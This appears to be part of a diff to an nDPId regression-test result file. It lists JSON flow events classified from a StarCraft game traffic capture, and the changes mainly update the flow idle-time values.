-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1437389958129,"flow_last_seen":1437389968685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.208.193","src_port":3427,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
-00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 